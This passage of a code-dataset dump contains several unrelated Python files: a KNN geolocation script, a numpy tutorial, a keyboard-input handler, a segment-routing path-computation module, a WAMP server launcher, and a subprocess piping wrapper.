lnglatWeights(row,multipler):\n return [row[0],row[1],row[2],row[3]*multipler,row[4]*multipler];\n\ngeo_rate = 100000000.\n\nx = np.apply_along_axis(lnglatWeights, 1, x,geo_rate )\nprint(x)\nprint(y)\n\n\nknc = neighbors.KNeighborsClassifier(algorithm='auto')\n\nknc.fit(x, y)\n\n# try example:\n\n# 76 Valhalla Street Sunnybank Qld 4109\n# 4,3,2,-27.5753528,153.064843\n\nresults = knc.kneighbors([[4,3,2,-27.5753528 * geo_rate, 153.064843 * geo_rate]])\n\nprint(\"neighbors for 76 Valhalla Street Sunnybank Qld 4109: \", results[1][0])\n","sub_path":"Model/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"341334611","text":"# coding: utf-8\n\nimport numpy as np\n#1d Array\na = [1,2,3,4]\nar = np.array(a)\nprint(ar)\nprint(ar.ndim)\nprint(ar.shape)\n\n#2d Array\nb = [[1,2],[3,4],[5,6]]\nbr = np.array(b)\nprint(br)\nprint(br.ndim)\nprint(br.shape)\n\n#Shape 변경\nbr.shape = (2,3)\n\n#2d를 1d로 변경\nbr.shape = (6,)\nprint(br.ndim)\n\n#numpy dtype\nprint(br.dtype)\n\n#numpy array의 모든 원소는 같은 type임\nb[0][0] = 1.5\nbr = np.array(b)\nprint(br.dtype) #하나라도 실수면 float64 타입이 \n\n#numpy 1d Array와 2d (1-by-N) Array는 다름\nbr.shape = (1,6)\nprint(br)\nprint(br.shape)\nprint(br.ndim)\n\n#numpy array를 만드는 다양한 방법\nc = np.zeros((10,3))\nd = np.ones((5,4))\ne = np.ones((5,4))*2\nf = np.ones((5,4))+10\n\ng = np.empty((3,4))\nh = np.eye(3)\n\ni = np.arange(5)\nj = np.linspace(1,100,10)\nk = np.linspace(0,100,10)\nl = np.linspace(0,100,11)\nprint(l.ndim)\n\n\n#array indexing / slicing\n#1d\na[0]\na[1]\na[:2]\na[:3]\na[-1]\na[:-1]\n\n#2d\nbr.shape = (3,2)\nbr[0,0]\nbr[0,1]\nbr[1,0]\nbr[:,0]\n\nbr[:,0].shape #1d\nbr[:,0:1].shape #2d\n\nimport random\nm = random.random()\nn = random.gauss(0,10)\n\n#numpy를 이용한 random number 생성\nnp.random.random((3,4))\nx = np.random.random((1000000,2))\nprint(x.shape)\n\n#numpy sorting (axis=0 세로 방향 / 1 가로 방향)\nx.sort(1)\nx.sort(0)\n\n#컬럼 1과 0의 차이 계산\ny = x[:,1]-x[:,0]\n","sub_path":"semester1/프로그래밍/week4_numpy/lecture4.py","file_name":"lecture4.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294545302","text":"from .key import Key as _Key\r\n\r\n\r\nclass Keyboard:\r\n __last_key = None\r\n __active_keys = list()\r\n __writing_mode = True\r\n\r\n __key_binds_down = list()\r\n __key_binds_up = list()\r\n __key_binds_pressed = list()\r\n\r\n up = 273\r\n down = 274\r\n left = 276\r\n right = 275\r\n shiftLeft = 304\r\n shiftRight = 303\r\n altLeft = 308\r\n altRight = 307\r\n ctrlLeft = 306\r\n ctrlRight = 305\r\n capslock = 301\r\n tab = 9\r\n backspace = 8\r\n enter = 13\r\n windows = 211\r\n\r\n @staticmethod\r\n def _add_binds(key_list, func, keys):\r\n keys = set(sorted(list(keys)))\r\n for key_bind in key_list:\r\n if key_bind[0] == keys:\r\n key_list.remove(key_bind)\r\n break\r\n key_list.append((keys, func))\r\n\r\n @staticmethod\r\n def key_press_down(keypress):\r\n key = _Key(keypress.key, keypress.mod, keypress.unicode)\r\n key.set_press_down()\r\n Keyboard.__last_key = key\r\n Keyboard.__active_keys.append(key)\r\n\r\n active_keys = set(key.get_type() for key in Keyboard.__active_keys)\r\n for combination in Keyboard.__key_binds_down:\r\n keys, func = combination\r\n if keys.issubset(active_keys):\r\n func()\r\n\r\n @staticmethod\r\n def key_press_up(keypress):\r\n for key in Keyboard.__active_keys:\r\n if key.get_type() == keypress.key:\r\n key.set_press_up()\r\n if Keyboard.__writing_mode and key.get_type() in (Keyboard.shiftLeft, Keyboard.shiftRight):\r\n Keyboard.reset_shift()\r\n\r\n active_keys = set(key.get_type() for key in Keyboard.__active_keys)\r\n for combination in Keyboard.__key_binds_up:\r\n keys, func = combination\r\n if keys.issubset(active_keys):\r\n func()\r\n\r\n @staticmethod\r\n def update_keys():\r\n for key in Keyboard.__active_keys:\r\n key.update()\r\n\r\n active_keys = set(key.get_type() for key in Keyboard.__active_keys)\r\n for combination in Keyboard.__key_binds_pressed:\r\n keys, func = combination\r\n if keys.issubset(active_keys):\r\n func()\r\n\r\n @staticmethod\r\n def reset_shift():\r\n for key in Keyboard.__active_keys:\r\n if key.get_mod() == 1 or key.get_mod() == 2:\r\n key.set_press_up()\r\n\r\n @staticmethod\r\n def reset_last_keys():\r\n for key in Keyboard.__active_keys:\r\n if not key.get_pressed():\r\n Keyboard.__active_keys.remove(key)\r\n if key == Keyboard.__last_key:\r\n Keyboard.__last_key = None\r\n\r\n @staticmethod\r\n def update():\r\n Keyboard.reset_last_keys()\r\n Keyboard.update_keys()\r\n\r\n @staticmethod\r\n def get_last():\r\n return Keyboard.__last_key\r\n\r\n @staticmethod\r\n def get_active():\r\n return Keyboard.__active_keys\r\n\r\n @staticmethod\r\n def writing_mode_on():\r\n Keyboard.__writing_mode = True\r\n\r\n @staticmethod\r\n def writing_mode_off():\r\n Keyboard.__writing_mode = False\r\n\r\n @staticmethod\r\n def get_writing_mode():\r\n return Keyboard.__writing_mode\r\n\r\n @staticmethod\r\n def set_key_bind_down(func, *keys):\r\n Keyboard._add_binds(Keyboard.__key_binds_down, func, keys)\r\n\r\n @staticmethod\r\n def set_key_bind_up(func, *keys):\r\n Keyboard._add_binds(Keyboard.__key_binds_up, func, keys)\r\n\r\n @staticmethod\r\n def set_key_bind_pressed(func, *keys):\r\n Keyboard._add_binds(Keyboard.__key_binds_pressed, func, keys)\r\n\r\n @staticmethod\r\n def key_bind_down(*keys):\r\n def wrapper(func):\r\n Keyboard.set_key_bind_down(func, *keys)\r\n return func\r\n return wrapper\r\n\r\n @staticmethod\r\n def key_bind_up(*keys):\r\n def wrapper(func):\r\n Keyboard.set_key_bind_up(func, *keys)\r\n return func\r\n return wrapper\r\n\r\n @staticmethod\r\n def key_bind_pressed(*keys):\r\n def wrapper(func):\r\n Keyboard.set_key_bind_pressed(func, *keys)\r\n return func\r\n return wrapper\r\n","sub_path":"pc_input/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"344179824","text":"from heapq import heappush, heappop, heapify\nfrom cxpasta.utils.decorators import timer\n\n\nclass Topology(object):\n\n def __init__(self, **kwargs):\n self.non_sr = set()\n self.nodes = self.make_nodes(kwargs.get('nodes', []))\n self.links = self.make_links(kwargs.get('links', []))\n self.topo = self.make_topo(self.links)\n\n def make_nodes(self, nodes):\n \"\"\"Turn node list into a hash table.\n If it's a non-sr node, add it to self.non_sr\n \"\"\"\n data = {}\n for node in nodes:\n id = node['id']\n data[id] = {}\n if 'ip' in node:\n data[id]['ip'] = node['ip']\n if 'sid' in node:\n data[id]['sid'] = node['sid']\n else:\n self.non_sr.add(id)\n return data\n\n def make_links(self, links):\n \"\"\"Turn link list into a hash table.\n If it's a non-sr link, add it to self.non_sr\n \"\"\"\n data = {}\n for link in links:\n id = link['id']\n data[id] = {\n 'lo': link['lo'],\n 're': link['re'],\n 'igp': link['igp'],\n 'te': link['te'],\n 'delay': link['delay'],\n 'bd': link['bd'],\n 'affi': link['affi']\n }\n if 'ip' in link:\n data[id]['ip'] = link['ip']\n if 'sid' in link:\n data[id]['sid'] = link['sid']\n else:\n self.non_sr.add(id)\n return data\n\n def make_topo(self, links):\n \"\"\"Turn link list into a hash table that represents the topology.\n \"\"\"\n data = {}\n for k, v in links.items():\n if v['lo'] not in data:\n data[v['lo']] = {}\n data[v['lo']][k] = {\n 're': v['re'],\n 'igp': v['igp'],\n 'te': v['te'],\n 'delay': v['delay']\n }\n return data\n\n\nclass SPF(object):\n\n def __init__(self, topo, src, dest, metric='igp', loose=False, top=10):\n self.topo = topo\n self.src = src\n self.dest = dest\n self.metric = metric\n self.loose = loose\n self.top = top\n\n def spf(self):\n \"\"\"Return standard SPF.\n \"\"\"\n entry = [0, self.src, [self.src]]\n sofar = {self.src: entry}\n heap = [entry]\n final = {}\n\n while sofar:\n (cost, node, prev) = heappop(heap)\n final[node] = sofar[node]\n del sofar[node]\n if node == self.dest:\n return final[node][2]\n if node in self.topo:\n for k, v in self.topo[node].items():\n nei = v['re']\n if nei not in final:\n new_cost = cost + v[self.metric]\n new_prev = [f'{p} {k} {nei}' for p in prev]\n new_entry = [new_cost, nei, new_prev]\n if nei not in sofar:\n sofar[nei] = new_entry\n heappush(heap, new_entry)\n elif new_cost < sofar[nei][0]:\n sofar[nei][0] = new_cost\n sofar[nei][1] = nei\n sofar[nei][2] = new_prev\n heapify(heap)\n elif new_cost == sofar[nei][0]:\n sofar[nei][2] += new_prev\n return []\n\n def non_spf(self):\n \"\"\"Return all the paths that are reachable between two nodes.\n \"\"\"\n entry = [0, self.src, [self.src]]\n sofar = {self.src: entry}\n heap = [entry]\n final = {}\n\n while sofar:\n (cost, node, prev) = heappop(heap)\n if node in final:\n final[node][2] += prev\n else:\n final[node] = sofar[node]\n del sofar[node]\n if node == self.dest and len(final[node][2]) >= self.top:\n break\n if node in self.topo:\n for k, v in self.topo[node].items():\n nei = v['re']\n new_cost = cost + v[self.metric]\n loop_prev = [f'{p} {k} {nei}' for p in prev]\n new_prev = loop_prev[:]\n if nei in final:\n for f in final[nei][2]:\n for p in loop_prev:\n if f in p:\n new_prev.remove(p)\n if new_prev:\n new_entry = [new_cost, nei, new_prev]\n if nei not in sofar:\n sofar[nei] = new_entry\n heappush(heap, new_entry)\n elif new_cost < sofar[nei][0]:\n sofar[nei][0] = new_cost\n sofar[nei][1] = nei\n sofar[nei][2] += new_prev\n heapify(heap)\n elif new_cost >= sofar[nei][0]:\n sofar[nei][2] += new_prev\n if self.dest in final:\n return final[self.dest][2]\n else:\n return []\n\n def run(self):\n \"\"\"Client-easy builder method.\n Turn path string into list of hops.\n \"\"\"\n if self.loose:\n return [path.split() for path in self.non_spf()]\n return [path.split() for path in self.spf()]\n\n\nclass Simple(Topology):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.he = self.make_filter(kwargs.get('he', None))\n self.te = self.make_filter(kwargs.get('te', None))\n\n def make_filter(self, element):\n if element in self.nodes:\n return element\n elif element in self.links:\n return element\n else:\n raise Exception(f'{element} does not exist.')\n\n @timer\n def run(self):\n return {\n 'paths': SPF(self.topo, self.he, self.te).run()\n }\n\n\nclass Pasta(Simple):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.metric = kwargs.get('metric', 'igp')\n if self.metric == 'latency':\n self.metric = 'delay'\n self.inc = [self.make_filter(item) for item in kwargs.get('inc', [])]\n self.man_exc = {self.make_filter(item) for item in kwargs.get('exc', [])}\n self.bd = kwargs.get('bd', 0)\n self.affi = kwargs.get('affi', 0)\n self.mask = kwargs.get('mask', 0)\n self.sorter = kwargs.get('sorter', 'metric')\n self.top = kwargs.get('top', 10)\n self.limit = kwargs.get('limit', 0)\n self.loose = kwargs.get('loose', False)\n self.dis = kwargs.get('dis', False)\n self.exclude()\n\n def on_demand_bandwidth(self):\n \"\"\"Exclude links that are not with enough bandwidth.\n \"\"\"\n for k, v in self.links.items():\n bd = v.get('bd', -1)\n if bd != -1 and bd < self.bd:\n self.exc.add(k)\n\n def affinity_and_mask(self):\n \"\"\"Exclude links that are not fullfill affinity & mask.\n affi: 0000 0001\n mask: 0000 0011\n affi & mask = 0000 0001\n ~affi & mask = 0000 0010\n link1: 0000 0001 ok\n link2: 0000 0010 invalid\n link3: 0000 0011 invalid\n \"\"\"\n try:\n affi = int(self.affi, 16)\n mask = int(self.mask, 16)\n except:\n raise Exception('Invalid affinity and mask value.')\n\n inc = affi & mask\n exc = ~affi & mask\n for k, v in self.links.items():\n link_affi = v['affi']\n if link_affi & inc != inc:\n self.exc.add(k)\n if link_affi & exc != 0:\n self.exc.add(k)\n\n def exclude(self):\n \"\"\"Add all kinds of exludes together.\n \"\"\"\n self.exc = self.man_exc.union(self.non_sr)\n if self.bd:\n self.on_demand_bandwidth()\n if self.affi and self.mask:\n self.affinity_and_mask()\n\n def remake_topo(self, exc):\n \"\"\"Re-generate topology after exclude certain nodes and links.\n \"\"\"\n return self.make_topo({\n k: v for k, v in self.links.items()\n if k not in exc and v['lo'] not in exc and v['re'] not in exc\n })\n\n def revert(self, sids, simple=False):\n \"\"\"Turn a list of sids into segs of paths.\n \"\"\"\n metric, loose = ('igp', False) if simple else (self.metric, self.loose)\n src, sids = sids[0], sids[1:]\n if src in self.links:\n src = self.links[src]['re']\n segs = []\n for sid in sids:\n if sid == src:\n continue\n if sid in self.links:\n lo = self.links[sid]['lo']\n re = self.links[sid]['re']\n if sid == lo:\n paths = [[lo, sid, re]]\n else:\n paths = SPF(self.topo, src, lo, metric, loose, self.top).run()\n paths = [path + [sid, re] for path in paths]\n src = re\n else:\n paths = SPF(self.topo, src, sid, metric, loose, self.top).run()\n src = sid\n segs.append(paths)\n return segs\n\n def rsv(self, paths, exc):\n \"\"\"Return paths and actually path-effected excludes after excluded.\n \"\"\"\n if not exc:\n return paths, exc\n rsv_exc = set()\n rsv_paths = paths[:]\n for path in paths:\n for e in exc:\n if e in path:\n rsv_exc.add(e)\n if path in rsv_paths:\n rsv_paths.remove(path)\n return rsv_paths, rsv_exc\n\n def detail(self, path):\n \"\"\"Supplement each path with certain details.\n \"\"\"\n links = path[1::2]\n hop = len(links)\n first_hop, links = self.links[links[0]], links[1:]\n igp, te, delay, bd = [first_hop[k] for k in ['igp', 'te', 'delay', 'bd']]\n for link in links:\n link = self.links[link]\n igp += link['igp']\n te += link['te']\n delay += link['delay']\n bd = min(bd, link['bd'])\n return {\n 'path': path,\n 'igp': igp,\n 'te': te,\n 'delay': delay,\n 'min_hop': hop,\n 'max_min_band': bd\n }\n\n def tiebreaker(self, paths, top=None, limit=None):\n \"\"\"Return TOP sorted paths with certain order and limit.\n \"\"\"\n paths = [self.detail(path) for path in paths]\n sorter = self.metric if self.sorter == 'metric' else self.sorter\n if limit:\n if self.sorter == 'max_min_band':\n paths = [path for path in paths if path[sorter] >= self.limit]\n else:\n paths = [path for path in paths if path[sorter] <= self.limit]\n paths = sorted(paths, key=lambda c: c[sorter], reverse=self.sorter == 'max_min_band')\n if top:\n paths = paths[:top]\n return [path['path'] for path in paths]\n\n def flatten(self, segs):\n \"\"\"Flatten segs into hop-by-hop paths\n \"\"\"\n paths = []\n for seg in segs:\n if not paths:\n paths = seg\n else:\n paths = [p1 + p2[1:] for p1 in paths for p2 in seg]\n return paths\n\n def cspf(self):\n \"\"\"Return base paths and paths after exlude.\n \"\"\"\n src = self.he\n sids = [*self.inc, self.te]\n segs = []\n rsv_segs = []\n for sid in sids:\n paths = self.revert([src, sid])[0]\n rsv_paths, rsv_exc = self.rsv(paths, self.exc)\n if not rsv_paths:\n rsv_topo = self.remake_topo(self.exc)\n topo = self.remake_topo(rsv_exc)\n rsv_paths = SPF(rsv_topo, src, sid, self.metric, self.loose, self.top).run()\n paths += SPF(topo, src, sid, self.metric, self.loose, self.top).run()\n paths += [path for path in rsv_paths if path not in paths]\n segs.append(paths)\n rsv_segs.append(rsv_paths)\n src = sid\n paths = self.tiebreaker(self.flatten(segs))\n rsv_paths = self.tiebreaker(self.flatten(rsv_segs), self.top, self.limit)\n return paths, rsv_paths\n\n def entropy(self, nodes, paths):\n \"\"\"Node entropy by its counts in paths.\n If entropy is greater that 2, it's maybe a cross-node.\n \"\"\"\n ent = {}\n for node in nodes:\n weight = 0\n for path in paths:\n if node in path:\n weight += 1\n ent[node] = weight\n return ent\n\n def cut(self, paths, src, dest):\n \"\"\"Cut paths with certain start & end.\n \"\"\"\n rsv_segs = []\n for path in paths:\n if src in path and dest in path:\n idx_src = path.index(src)\n idx_dest = path.index(dest)\n path = path[idx_src:idx_dest + 1]\n if path not in rsv_segs:\n rsv_segs.append(path)\n return rsv_segs\n\n def match(self, rsv_paths, path, src, dest):\n \"\"\"Return if cspf-paths matches spf-paths.\n \"\"\"\n spf_segs = SPF(self.topo, src, dest, 'igp').run()\n rsv_segs = self.cut(rsv_paths, src, dest)\n rsv_seg = self.cut([path], src, dest)[0]\n if rsv_seg not in spf_segs:\n return False\n else:\n for path in spf_segs:\n if path not in rsv_segs:\n return False\n return True\n\n def encode(self, paths, rsv_paths):\n \"\"\"Return encoded sids list.\n \"\"\"\n sids_paths = []\n rev_paths = []\n for path in rsv_paths:\n if path not in rev_paths:\n sids = []\n nodes = [hop for hop in path[::2]]\n entropy = self.entropy(nodes, paths)\n print(entropy)\n xnodes = [ent for ent in entropy if entropy[ent] > 1]\n if len(xnodes) > 2:\n head = self.he\n src = self.he\n temp = xnodes[1]\n for xnode in xnodes[1:]:\n if not self.match(rsv_paths, path, src, xnode):\n idx = path.index(src)\n node_adj = path[idx: idx + 2]\n sids += node_adj\n head = path[idx + 2]\n elif head != src:\n if entropy[src] >= entropy[temp]:\n temp = src\n if not self.match(rsv_paths, path, head, xnode):\n if temp != src and head != temp:\n if not self.match(rsv_paths, path, temp, xnode):\n sids.append(src)\n head = src\n else:\n sids.append(temp)\n head = temp\n else:\n sids.append(src)\n head = src\n src = xnode\n else:\n head = self.he\n for node in nodes[1:]:\n if not self.match(rsv_paths, path, head, node):\n idx = path.index(node)\n sids += path[idx - 2: idx]\n head = node\n sids.append(self.te)\n segs = self.revert([self.he, *sids], True)\n rev_path = self.flatten(segs)\n sids_paths.append((sids, rev_path, segs))\n rev_paths += rev_path\n return sids_paths\n\n def disjoint(self, paths):\n \"\"\"Return disjoint paths.\n \"\"\"\n node_exc = {node for path in paths for node in path[2:-2:2]}\n link_exc = {link for path in paths for link in path[1::2]}\n cache_exc = set(self.exc)\n self.exc = self.exc.union(node_exc)\n paths, rsv_paths = self.cspf()\n if not rsv_paths:\n self.exc = cache_exc.union(link_exc)\n paths, rsv_paths = self.cspf()\n return paths, rsv_paths\n\n def sids(self, sids):\n \"\"\"Supplement sid with certain details.\n \"\"\"\n res = []\n for sid in sids:\n if sid in self.nodes:\n res.append({'id': sid, **self.nodes[sid]})\n else:\n res.append({'id': sid, **self.links[sid]})\n return res\n\n def tradeoff(self, paths):\n res = self.detail(paths[0])\n del res['path']\n for path in paths[1:]:\n detail = self.detail(path)\n res['igp'] = min(res['igp'], detail['igp'])\n res['te'] = min(res['te'], detail['te'])\n res['delay'] = min(res['delay'], detail['delay'])\n res['min_hop'] = min(res['min_hop'], detail['min_hop'])\n res['max_min_band'] = max(res['max_min_band'], detail['max_min_band'])\n return res\n\n @timer\n def run(self):\n \"\"\"Client-easy builder method.\n \"\"\"\n paths, rsv_paths = self.cspf()\n self.loose = False\n sids_paths = self.encode(paths, rsv_paths)\n if not sids_paths:\n res = {\n 'sids': [],\n 'paths': [],\n 'segs': [],\n 'attr': {},\n 'other': []\n }\n return res\n collection = [{\n 'sids': self.sids(sids),\n 'paths': paths,\n 'segs': segs,\n 'attr': self.tradeoff(paths)\n } for sids, paths, segs in sids_paths]\n res = {\n **collection[0],\n 'other': collection[1:]\n }\n if self.dis:\n res.update({\n 'd_sids': [],\n 'd_paths': [],\n 'd_other': []\n })\n best_paths = sids_paths[0][1]\n d_paths, d_rsv_paths = self.disjoint(best_paths)\n if d_rsv_paths:\n d_sids_paths = self.encode(d_paths, d_rsv_paths)\n d_collection = [{\n 'd_sids': self.sids(sids),\n 'd_paths': paths,\n 'd_segs': segs,\n 'd_attr': self.tradeoff(paths)\n } for sids, paths, segs in d_sids_paths]\n res.update({\n **d_collection[0],\n 'd_other': d_collection[1:]\n })\n return res\n\n\nclass Path(Topology):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.sids = kwargs.get('sids', [])\n self.sids_list = kwargs.get('sids_list', [])\n\n def revert(self, sids):\n \"\"\"Turn a list of sids into segs of paths.\n \"\"\"\n src, sids = sids[0], sids[1:]\n if src in self.links:\n src = self.links[src]['re']\n segs = []\n for sid in sids:\n if sid == src:\n continue\n if sid in self.links:\n lo = self.links[sid]['lo']\n re = self.links[sid]['re']\n if sid == lo:\n paths = [[lo, sid, re]]\n else:\n paths = SPF(self.topo, src, lo).run()\n paths = [path + [sid, re] for path in paths]\n src = re\n else:\n paths = SPF(self.topo, src, sid).run()\n src = sid\n segs.append(paths)\n return segs\n\n def flatten(self, segs):\n \"\"\"Flatten segs into hop-by-hop paths\n \"\"\"\n paths = []\n for seg in segs:\n if not paths:\n paths = seg\n else:\n paths = [p1 + p2[1:] for p1 in paths for p2 in seg]\n return paths\n\n @timer\n def run(self):\n \"\"\"Client-easy builder method.\n \"\"\"\n if self.sids:\n segs = self.revert(self.sids)\n paths = self.flatten(segs)\n return {\n 'paths': paths,\n 'segs': segs\n }\n if self.sids_list:\n paths_list = []\n segs_list = []\n for sids in self.sids_list:\n segs = self.revert(sids)\n paths = self.flatten(segs)\n paths_list += [paths]\n segs_list += [segs]\n return {\n 'paths': paths_list,\n 'segs': segs_list\n }\n","sub_path":"services/vista-backend/cxpasta/utils/pasta.py","file_name":"pasta.py","file_ext":"py","file_size_in_byte":20734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"462590374","text":"import asyncio\nimport logging\n\nfrom autobahn.asyncio import wamp, websocket\n\nfrom input import myo\nfrom ninja import service as ninja_service\nfrom services import bart_service\nfrom services import hue_service\n\nHUE_ENABLE = False\nBART_ENABLE = False\nMYO_ENABLE = False\nNINJA_ENABLE = True\n\n# logging.basicConfig(level=logging.DEBUG)\n\n\nif __name__ == '__main__':\n # 1) create a WAMP router factory\n router_factory = wamp.RouterFactory()\n # 2) create a WAMP router session factory\n session_factory = wamp.RouterSessionFactory(router_factory)\n\n # 3) add embedded WAMP application sessions to the router\n if HUE_ENABLE:\n session_factory.add(hue_service.HueService())\n print('enabled Hue service')\n if BART_ENABLE:\n session_factory.add(bart_service.BartService())\n print('enabled BART service')\n if MYO_ENABLE:\n session_factory.add(myo.MyoService())\n print('enabled Myo output service')\n if NINJA_ENABLE:\n session_factory.add(ninja_service.NinjaService())\n print('enabled NinjaBocks service')\n\n # 4) create a WAMP-over-WebSocket transport server factory\n transport_factory = websocket.WampWebSocketServerFactory(session_factory,\n debug=True,\n debug_wamp=True)\n # 5) build the loop\n loop = asyncio.get_event_loop()\n coro = loop.create_server(transport_factory, '127.0.0.1', 9000)\n # 6) Connect to MYO\n if MYO_ENABLE:\n loop.run_until_complete(myo.get_factory(loop))\n\n # 7) now start the server and enter the asyncio event loop\n server = loop.run_until_complete(coro)\n try:\n print('running server..')\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n finally:\n server.close()\n loop.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"405160014","text":"\"\"\"\npysh main library\n\"\"\"\nimport logging, subprocess, os, copy, io\n\nlog = logging.getLogger(__name__)\n\nclass Process(object):\n \n def __init__(self, *popen_args, timeout=2, decode_to='utf-8', encode_from='utf-8', procname=None, **popen_kwargs):\n \n # Reference to subprocess.Popen \n self.proc = None\n self.procname = procname\n # other is the Process, if any, that started this Process\n self.other = None\n self.upstream = None\n self.downstream = None\n \n # Arguments to be passed directly to subprocess.Popen\n self.popen_args = list(popen_args)\n self.popen_kwargs = popen_kwargs\n \n # timeout value for Popen.communicate()\n self.timeout = timeout\n # encoding argument for stdout.decode in __str__\n self.decode_to = decode_to\n self.encode_from = encode_from\n \n def __repr__(self):\n procname = self.procname\n if not procname:\n procname = self.popen_args\n return ''.format(procname)\n \n def __bytes__(self):\n \"\"\"\n Get complete stdout as bytes. \n Blocks until subprocess is done via subprocess.communicate().\n \"\"\"\n log.debug('__bytes__(self={})'.format(repr(self)))\n\n # Start our process, capturing stdout\n if self.other and self.other.proc and self.other.proc.stdout:\n self.run(stdin=self.other.proc.stdout, stdout=subprocess.PIPE)\n else:\n self.run(stdout=subprocess.PIPE)\n \n # Communicate with our process, blocking until 1) subprocess exits 2) timeout expires\n # Blocking is necessary since __str__ must return a single string.\n try:\n stdout, stderr = self.proc.communicate(timeout=self.timeout)\n except subprocess.TimeoutExpired:\n log.debug('communicate() timeout of {} seconds expired. Killing process: {}'.format(self.timeout, repr(self)))\n self.proc.kill()\n stdout, stderr = self.proc.communicate(timeout=self.timeout)\n \n # Return decoded string, not bytes\n return stdout\n \n def __str__(self):\n \"\"\"\n Get complete stdout as string. String incoding is defined by self.decode_to.\n Blocks until subprocess is done via subprocess.communicate().\n \"\"\"\n log.debug('__str__(self={})'.format(repr(self)))\n return self.__bytes__().decode(self.decode_to)\n \n def __call__(self, *more_popen_args, timeout=None, decode_to=None, encode_from=None, procname=None, **more_popen_kwargs):\n \"\"\"\n Arguments to __call__ mirror, and override, those to __init__. \n \"\"\"\n log.debug('__call__(self={}, more_popen_args={}, more_popen_kwargs={})'.format(repr(self), more_popen_args, more_popen_kwargs))\n \n # Clone self\n clone = copy.deepcopy(self)\n \n # Possibly overwrite settings\n if timeout:\n clone.timeout = timeout\n if decode_to:\n clone.decode_to = decode_to\n if encode_from:\n clone.encode_from = encode_from\n if procname:\n clone.procname = procname\n # Append popen arguments to already provided arguments\n clone.popen_args.extend(more_popen_args)\n clone.popen_kwargs.update(more_popen_kwargs)\n\n return clone\n \n def __or__(self, downstream):\n log.debug('__or__(self={}, downstream={})'.format(repr(self), repr(downstream)))\n \n self.other = downstream\n self.downstream = downstream\n \n # Start process if not running, capturing stdout in pipe\n # if not self.proc:\n self.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n # Start up other's process if not running\n # if self.downstream and not self.downstream.proc:\n self.downstream.start_by_upstream(upstream=self, stdout=subprocess.PIPE)\n \n # Always return downstream so that we \"or\" forward in the pipeline\n return downstream\n \n def __ror__(self, upstream):\n \"\"\"\n Apparently only called when upstream is not a Process. \n \n \"some line\" | more\n \n Returns self so we always move to the right of the pipeline.\n \"\"\"\n log.debug('__ror__(self={}, upstream={})'.format(repr(self), repr(upstream)))\n \n self.other = upstream\n self.upstream = upstream\n \n if isinstance(upstream, str):\n self.run(stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n # Write to self.proc.stdin then close pipe\n self.proc.stdin.write(upstream.encode(self.encode_from))\n self.proc.stdin.flush()\n self.proc.stdin.close()\n \n return self\n \n def __add__(self, other):\n \"\"\"\n # sudo ping www.yahoo.com\n sudo + ping('www.yahoo.com') \n # -> ['sudo', 'ping', 'www.yahoo.com']\n\n Like __call__, this function returns a clone of self.\n \"\"\"\n clone = copy.deepcopy(self)\n clone.popen_args += other.popen_args\n clone.popen_kwargs.update(other.popen_kwargs)\n return clone\n \n def run(self, stdin=None, stdout=None, stderr=None):\n log.debug('run(self={}, stdin={}, stdout={}, stderr={})'.format(repr(self), stdin, stdout, stderr))\n \n # See if our process is already running\n if self.proc and self.proc.poll() is None:\n # Proccess is running\n log.debug('Process is already running')\n return\n\n try:\n # TODO handle stderr\n self.proc = subprocess.Popen(self.popen_args, stdin=stdin, stdout=stdout, **self.popen_kwargs)\n except ValueError as e:\n # log.error(e)\n log.info('Upstream process probably finished before downstream process could read pipe.')\n raise e\n\n def start_by_upstream(self, upstream=None, stdout=None, stderr=None):\n log.debug('start_by_upstream(self={}, upstream={}, stdout={}, stderr={})'.format(repr(self), repr(upstream), stdout, stderr))\n self.other = upstream\n self.upstream = upstream\n self.run(stdin=upstream.proc.stdout, stdout=stdout, stderr=stderr)\n\n def start_by_downstream(self, downstream=None, stdout=None, stderr=None):\n log.debug('start_by_downstream(self={}, downstream={}, stdout={}, stderr={})'.format(repr(self), repr(downstream), stdout, stderr))\n # We don't set stdin because downstream can't know what stdin for an upstream Process should be\n self.other = downstream\n self.downstream = downstream\n self.run(stdout=stdout, stderr=stderr)\n\nclass Echo(Process):\n \"\"\"\n Causes upstream process \"other\" to be started and print()ed to terminal.\n Upstream process will be started since its __or__ will be called. \n \"\"\"\n def __repr__(self):\n return ''\n \n def run(self, stdin=None, stdout=None, stderr=None, other=None):\n \"\"\"\n Echo.run() is slightly different than Process.run() because it needs a reference to \n \"other\" in case it has to other.proc.kill()\n \"\"\"\n log.debug('Echo.run(self={}, stdin={}, stdout={})'.format(repr(self), stdin, stdout))\n \n while True:\n # Read from stdout\n try:\n stdout_bytes = stdin.readline()\n except KeyboardInterrupt as e:\n # We often get here if process we are reading from blocks for input and we ctrl+c out\n log.debug('Caught KeyboardInterrupt. Closing stdin pipe')\n stdin.close()\n other.proc.kill()\n stdout_bytes = None\n except ValueError as e:\n log.debug('Caught ValueError. Pipe must be closed')\n stdout_bytes = None\n if not stdout_bytes:\n break\n print(stdout_bytes.decode(encoding=self.decode_to), end='')\n \n # Read from stderr and raise exception if found\n if stderr:\n stderr_bytes = stderr.readline()\n if stderr_bytes:\n raise Exception(stderr_bytes.decode(encoding=self.decode_to))\n\n def start_by_upstream(self, upstream=None, stdout=None, stderr=None):\n log.debug('Echo.start_by_upstream(self={}, upstream={}, stdout={})'.format(repr(self), repr(upstream), stdout))\n self.run(stdin=upstream.proc.stdout, stdout=stdout, stderr=stderr, other=upstream)\n\n def __call__(self, other=None):\n \"\"\"\n 